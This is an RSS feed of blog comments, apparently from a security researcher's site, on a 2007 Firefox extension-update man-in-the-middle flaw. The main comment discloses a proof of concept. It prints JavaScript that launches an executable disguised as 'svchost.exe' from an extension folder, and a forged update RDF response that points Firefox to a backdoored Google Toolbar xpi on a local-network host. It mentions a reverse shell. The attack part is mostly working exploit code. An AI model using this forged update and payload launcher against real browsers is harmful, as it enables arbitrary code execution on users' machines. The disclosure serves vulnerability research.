Ferruh Mavituna - Me, Myself and My Alter Ego... Ferruh Mavituna http://ferruh.mavituna.com Paz, 21 Mar 2010 02:01:55 +0200 http://ferruh.mavituna.com http://ferruh.mavituna.com/rss/rss.gif http://ferruh.mavituna.com/firefox-hash-oku/ Ferruh Mavituna Sal, 12 Şub 2008 15:38:21 +0200 <a href="http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0535.html">http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0535.html</a><br /><br />Very good and detailed advisory,<br />I came up with the same issue about one month ago and developed two PoCs.<br /><br />Here is the hash :<a href="http://ferruh.mavituna.com/makale/firefox-hash/">http://ferruh.mavituna.com/makale/firefox-hash/</a> (shame on<br />me that I haven't sent to any public mail-list. If you really curious check<br />out RSS caches and google cache) and brief explanation is in the attachment<br />(Firefox-MITM.txt).<br /><br />I attached Google Toolbar PoC. Be careful it's throwing a reverse shell also<br />I got a PoC for Linux as well.<br /><br />To clarify things, you can execute arbitrary code with current user's<br />rights.<br /><br />Here is a sample code,<br />--------------------<br />exepath = Components.classes[&quot;mozilla.org/file/directory_service;1&quot;].getService(<br />Components.interfaces.nsIProperties).get(&quot;ProfD&quot;,<br />Components.interfaces.nsIFile).path +<br />&quot;\\extensions\\{3112ca9c-de6d-4884-a869-9855de68056c}\\chrome\\svchost.exe&quot;;<br /> runFile(exepath);<br /><br />function runFile(f) {<br /> var file = Components.classes[&quot;mozilla.org/file/local;1&quot;]<br /> .createInstance(Components.interfaces.nsILocalFile);<br /><br /> file.initWithPath(f);<br /><br /> var process = Components.classes[&quot;mozilla.org/process/util;1&quot;]<br /> .createInstance(Components.interfaces.nsIProcess);<br /><br /> process.init(file);<br /><br /> var args = [&quot;&quot;];<br /> process.run(false, args, args.length);<br />}<br /><br />--------------------<br /><br />Sample update response XML,<br />----------<br />&lt;?xml version=&quot;1.0&quot;?&gt;&lt;RDF:RDF xmlns:RDF=&quot;<br />http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot; xmlns:em=&quot;<br />http://www.mozilla.org/2004/em-rdf#&quot;&gt;<br />&lt;RDF:Description<br />about=&quot;urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}&quot;&gt;<br />&lt;em:updates&gt;&lt;RDF:Seq&gt;<br />&lt;RDF:li<br />resource=&quot;urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}:<br />4.0.0.16&quot;/&gt;<br />&lt;/RDF:Seq&gt;&lt;/em:updates&gt;&lt;/RDF:Description&gt;<br />&lt;RDF:Description<br />about=&quot;urn:mozilla:extension:{3112ca9c-de6d-4884-a869-9855de68056c}:4.0.0.16<br />&quot;&gt;<br />&lt;em:version&gt;4.0.0.16&lt;/em:version&gt;<br />&lt;em:targetApplication&gt;&lt;RDF:Description&gt;<br />&lt;em:id&gt;{ec8030f7-c20a-464f-9b0e-13a3a9e97384}&lt;/em:id&gt;<br />&lt;em:minVersion&gt;1.5.0&lt;/em:minVersion&gt;<br />&lt;em:maxVersion&gt;2.9.99&lt;/em:maxVersion&gt;<br />&lt;em:updateLink&gt;http://192.168.1.130/firefox/google.xpi&lt;/em:updateLink&gt;<br />&lt;/RDF:Description&gt;&lt;/em:targetApplication&gt;&lt;/RDF:Description&gt;<br />&lt;/RDF:RDF&gt;<br />----------<br />This is our backdoored xpi file url :<br />http://192.168.1.130/firefox/google.xpi<br />I modified the google-toolbar.xul and added to run svchost.exe file which is<br />in xpi file as well.<br /><br />Sample xpi file attached, modified version of google toolbar extension and<br />it will work every time you launch Firefox. http://ferruh.mavituna.com/firefox-hash-oku/ SW Pzt, 21 May 2007 17:50:35 +0200 ha s&#246;yle ya; sadece firmanin kendisi kadar g&#252;venliklerine dikkat etsen yeter<img src="/mg/smilies/smile.gif" width="21" height="22" alt=":)" />